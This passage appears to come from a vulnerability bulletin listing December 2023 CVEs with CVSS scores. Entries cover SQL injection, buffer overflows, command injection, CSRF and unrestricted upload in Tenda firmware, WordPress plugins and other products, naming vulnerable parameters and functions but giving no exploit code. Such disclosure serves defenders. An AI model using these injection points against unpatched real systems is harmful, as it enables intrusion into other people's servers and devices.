projectworlds_pvt._limited — student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48722
[email protected]
[email protected]
projectworlds_pvt._limited — student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘rno’ parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48723
[email protected]
[email protected]
redpanda — redpandaRedpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API.2023-12-189.8CVE-2023-50976
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
rmountjoy92 — dashmachineA vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability.2023-12-179.8CVE-2023-6899
[email protected]
[email protected]
[email protected]
rmountjoy92 — dashmachineA vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: ‘../filedir’. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability.2023-12-179.1CVE-2023-6900
[email protected]
[email protected]
[email protected]
shenzen_libituo_technology_co.,_ltd — lbt-t300-t310_firmwareShenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi.2023-12-159.8CVE-2023-50469
[email protected]
silabs — gecko_software_development_kitAn unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory.2023-12-159.1CVE-2023-4020
[email protected]
[email protected]
softnext — mail_sqr_expertSoftnext Mail SQR Expert is an email management platform, it has insufficient filtering for a special character within a spcific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service.2023-12-158CVE-2023-48380
[email protected]
softnext — mail_sqr_expertSoftnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2023-12-157.5CVE-2023-48378
[email protected]
solarwinds — access_rights_managerSensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment.2023-12-217.6CVE-2023-40058
[email protected]
sourcecodester — best_courier_management_systemA vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256.2023-12-179.8CVE-2023-6898
[email protected]
[email protected]
[email protected]
starnight — micro_http_serverIn MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI.2023-12-179.8CVE-2023-50965
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function.2023-12-209.8CVE-2023-50983
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function.2023-12-209.8CVE-2023-50984
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function.2023-12-209.8CVE-2023-50985
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function.2023-12-209.8CVE-2023-50986
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function.2023-12-209.8CVE-2023-50987
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function.2023-12-209.8CVE-2023-50988
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function.2023-12-209.8CVE-2023-50989
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function.2023-12-209.8CVE-2023-50990
[email protected]
[email protected]
tenda — i29_firmwareTenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function.2023-12-209.8CVE-2023-50992
[email protected]
[email protected]
tongda — tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-169.8CVE-2023-6885
[email protected]
[email protected]
[email protected]
totolink — a7100ru_firmwareA vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-189.8CVE-2023-6906
[email protected]
[email protected]
[email protected]
tutao — tutanotaTutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as `ftp:`, `smb:`, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim’s computer. Version 3.118.2 contains a patch for this issue.2023-12-159.3CVE-2023-46116
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
u-blox — toby-l2A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2 which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well.. This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280.2023-12-207.6CVE-2023-0011
[email protected]
uffizio — gps_trackerA Remote Code Execution vulnerability exist in Uffizio’s GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources2023-12-169.8CVE-2020-17485
[email protected]
[email protected]
uffizio — gps_trackerAn improper access control vulnerability exists in Uffizio’s GPS Tracker all versions that lead to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed.2023-12-167.5CVE-2020-17483
[email protected]
[email protected]
unrealircd — unrealircdA buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms.2023-12-167.5CVE-2023-50784
[email protected]
[email protected]
[email protected]
[email protected]
wangmarket — wangmarketA vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability.2023-12-179.8CVE-2023-6886
[email protected]
[email protected]
[email protected]
wasmer_io — wasmerWasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4.2023-12-228.4CVE-2023-51661
[email protected]
[email protected]
[email protected]
web-soudan — mw_wp_formThe MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.2023-12-169.8CVE-2023-6559
[email protected]
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop – Global Dropshipping. This issue affects Zendrop – Global Dropshipping: from n/a through 1.0.0.2023-12-2010CVE-2023-25970
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0.2023-12-2010CVE-2023-29384
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love. This issue affects Genesis Simple Love: from n/a through 2.0.2023-12-2010CVE-2023-49772
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes. This issue affects BCorp Shortcodes: from n/a through 0.23.2023-12-2010CVE-2023-49773
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6.2023-12-2110CVE-2023-49778
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa. This issue affects Corsa: from n/a through 1.5.2023-12-209.9CVE-2023-23970
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import. This issue affects Theme Demo Import: from n/a through 1.1.1.2023-12-209.1CVE-2023-28170
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import. This issue affects Olive One Click Demo Import: from n/a through 1.1.1.2023-12-209.1CVE-2023-29102
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon. This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2.2023-12-209.9CVE-2023-31215
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65.2023-12-209.9CVE-2023-31231
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in xtemos WoodMart – Multipurpose WooCommerce Theme. This issue affects WoodMart – Multipurpose WooCommerce Theme: from n/a through 1.0.36.2023-12-219.8CVE-2023-32242
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category. This issue affects Subscribe to Category: from n/a through 2.7.4.2023-12-209.3CVE-2023-32590
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.40.2023-12-209.9CVE-2023-33318
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.3.2023-12-209.9CVE-2023-34007
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus. This issue affects Export Import Menus: from n/a through 1.8.0.2023-12-209.9CVE-2023-34385
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in realmag777 HUSKY – Products Filter for WooCommerce Professional. This issue affects HUSKY – Products Filter for WooCommerce Professional: from n/a through 1.3.4.2.2023-12-209.8CVE-2023-40010
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Premio Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager. This issue affects Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2.2023-12-209.1CVE-2023-40204
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts – Enable Users to Submit Posts from the Front End. This issue affects User Submitted Posts – Enable Users to Submit Posts from the Front End: from n/a through 20230902.2023-12-209CVE-2023-45603
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5.2023-12-209.9CVE-2023-46149
[email protected]
wordpress — wordpressMissing Authorization vulnerability in Clever plugins Delete Duplicate Posts allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Delete Duplicate Posts: from n/a through 4.8.9.2023-12-199.8CVE-2023-47754
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Porto Theme Porto Theme – Functionality. This issue affects Porto Theme – Functionality: from n/a before 2.12.1.2023-12-199.3CVE-2023-48738
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spoonthemes Couponis – Affiliate & Submitting Coupons WordPress Theme. This issue affects Couponis – Affiliate & Submitting Coupons WordPress Theme: from n/a before 2.2.2023-12-199.8CVE-2023-49750
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spoon themes Adifier – Classified Ads WordPress Theme. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4.2023-12-209.3CVE-2023-49752
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6.2023-12-209.3CVE-2023-49776
[email protected]
wordpress — wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock. This issue affects Symbiostock: from n/a through 6.0.0.2023-12-209.1CVE-2023-49814
[email protected]
wordpress — wordpressThe Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn’t be too long, as the 2FA codes are 6 digits.2023-12-189.8CVE-2023-6272
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap. This issue affects Simple Wp Sitemap: from n/a through 1.2.1.2023-12-178.8CVE-2023-24380
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms. This issue affects Gravity Forms: from n/a through 2.7.3.2023-12-208.3CVE-2023-28782
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in BestWebSoft Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress: from n/a through 1.7.0.2023-12-208.5CVE-2023-29096
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Favethemes Houzez – Real Estate WordPress Theme. This issue affects Houzez – Real Estate WordPress Theme: from n/a before 2.8.3.2023-12-208.2CVE-2023-29432
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Themefic Ultimate Addons for Contact Form 7. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23.2023-12-208.5CVE-2023-30495
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress. This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10.2023-12-208.5CVE-2023-30750
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Foxskav Easy Bet. This issue affects Easy Bet: from n/a through 1.0.2.2023-12-208.1CVE-2023-31092
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in CrawlSpider SEO Change Monitor – Track Website Changes. This issue affects SEO Change Monitor – Track Website Changes: from n/a through 1.2.2023-12-208.5CVE-2023-33209
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics. This issue affects Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1.2023-12-188.8CVE-2023-33214
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Alex Raven WP Report Post allows SQL Injection. This issue affects WP Report Post: from n/a through 2.1.2.2023-12-188.8CVE-2023-34168
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square. This issue affects WooCommerce Square: from n/a through 3.8.1.2023-12-208.1CVE-2023-35876
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in Themesflat Themesflat Addons For Elementor. This issue affects Themesflat Addons For Elementor: from n/a through 2.0.0.2023-12-198.3CVE-2023-37390
[email protected]
wordpress — wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless. This issue affects GoCardless: from n/a through 2.5.6.2023-12-208.2CVE-2023-37871
[email protected]
wordpress — wordpressDeserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme. This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5.2023-12-208.3CVE-2023-40555
[email protected]
wordpress — wordpressThe Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.2023-12-188.8CVE-2023-4311
[email protected]
wordpress — wordpressMissing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in TienCOP WP EXtra allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects WP EXtra: from n/a through 6.2.2023-12-198.8CVE-2023-46212
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly – Ad Manager, AdSense Ads & Ads.Txt. This issue affects AdFoxly – Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5.2023-12-188.8CVE-2023-46617
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Master slider Master Slider Pro allows SQL Injection. This issue affects Master Slider Pro: from n/a through 3.6.5.2023-12-188.8CVE-2023-47506
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 2.0.3.2023-12-188.8CVE-2023-47787
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method. This issue affects Canada Post Shipping Method: from n/a through 2.8.3.2023-12-188.8CVE-2023-47789
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login. This issue affects Disable User Login: from n/a through 1.3.7.2023-12-188.8CVE-2023-47806
[email protected]
wordpress — wordpressMissing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects Participants Database: from n/a through 2.5.5.2023-12-198.8CVE-2023-48751
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.4.2023-12-188.8CVE-2023-48755
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor: from n/a through 2.6.13.2023-12-188.8CVE-2023-48762
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator – Add Animated SVG Easily. This issue affects SVGator – Add Animated SVG Easily: from n/a through 1.2.4.2023-12-188.8CVE-2023-48766
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology. This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9.2023-12-188.8CVE-2023-48768
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back. This issue affects Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3.2023-12-188.8CVE-2023-48769
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation. This issue affects Prevent Landscape Rotation: from n/a through 2.0.2023-12-188.8CVE-2023-48772
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect. This issue affects WooCommerce Login Redirect: from n/a through 2.2.4.2023-12-188.8CVE-2023-48773
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce. This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5.2023-12-188.8CVE-2023-48778
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC. This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0.2023-12-188.8CVE-2023-48781
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon. This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0.2023-12-188.8CVE-2023-49153
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Wow-Company Button Generator – easily Button Builder. This issue affects Button Generator – easily Button Builder: from n/a through 2.3.8.2023-12-188.8CVE-2023-49155
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.5.2023-12-188.8CVE-2023-49163
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra. This issue affects Ocean Extra: from n/a through 2.2.2.2023-12-198.8CVE-2023-49164
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2.2023-12-158.8CVE-2023-49197
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3.2023-12-158.8CVE-2023-49744
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23.2023-12-158.8CVE-2023-49749
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome. This issue affects Block for Font Awesome: from n/a through 1.4.0.2023-12-178.8CVE-2023-49751
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz – WooCommerce Comments. This issue affects WooDiscuz – WooCommerce Comments: from n/a through 2.3.0.2023-12-188.8CVE-2023-49759
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Giannopoulos Kostas WPsoonOnlinePage. This issue affects WPsoonOnlinePage: from n/a through 1.9.2023-12-188.8CVE-2023-49760
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Gravity Master Product Enquiry for WooCommerce. This issue affects Product Enquiry for WooCommerce: from n/a through 3.0.2023-12-188.8CVE-2023-49761
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite. This issue affects CSprite: from n/a through 1.1.2023-12-188.8CVE-2023-49763
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive. This issue affects Integrate Google Drive: from n/a through 1.3.4.2023-12-178.8CVE-2023-49769
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer. This issue affects CSV Importer: from n/a through 0.3.8.2023-12-178.8CVE-2023-49775
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair. This issue affects Fix My Feed RSS Repair: from n/a through 1.4.2023-12-178.8CVE-2023-49816
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite. This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1.2023-12-178.8CVE-2023-49824
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX – Currency Switcher Professional for WooCommerce. This issue affects FOX – Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4.2023-12-178.8CVE-2023-49834
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce. This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5.2023-12-188.8CVE-2023-49840
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce. This issue affects First Order Discount Woocommerce: from n/a through 1.21.2023-12-188.8CVE-2023-49843
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester. This issue affects WPPerformanceTester: from n/a through 2.0.0.2023-12-188.8CVE-2023-49844
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kurulu?u A.?. PayTR Taksit Tablosu – WooCommerce. This issue affects PayTR Taksit Tablosu – WooCommerce: from n/a through 1.3.1.2023-12-188.8CVE-2023-49853
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy – Smart Side Cart for WooCommerce. This issue affects Caddy – Smart Side Cart for WooCommerce: from n/a through 1.9.7.2023-12-188.8CVE-2023-49854
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter. This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3.2023-12-188.8CVE-2023-49855
[email protected]
wordpress — wordpressCross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template. This issue affects Custom Post Type Page Template: from n/a through 1.1.2023-12-188.8CVE-2023-50372
[email protected]
wordpress — wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution.2023-12-188.8CVE-2023-5882
[email protected]
wordpress — wordpressThe Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.2023-12-188.8CVE-2023-5886
[email protected]
wordpress — wordpressThe Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘ajaxUploadFonts’ function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site’s server which may make remote code execution possible.2023-12-158.8CVE-2023-6827
[email protected]
[email protected]
[email protected]
wordpress — wordpressThe Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the ‘content-dir’ HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server’s php.ini is configured with ‘allow_url_include’ set to ‘on’. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP.2023-12-238.1CVE-2023-6971
[email protected]
[email protected]
[email protected]
wordpress — wordpressThe Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-237.4CVE-2020-36769
[email protected]
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12.2023-12-207.1CVE-2023-26525
[email protected]
wordpress — wordpressImproper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2.2023-12-207.1CVE-2023-28788
[email protected]
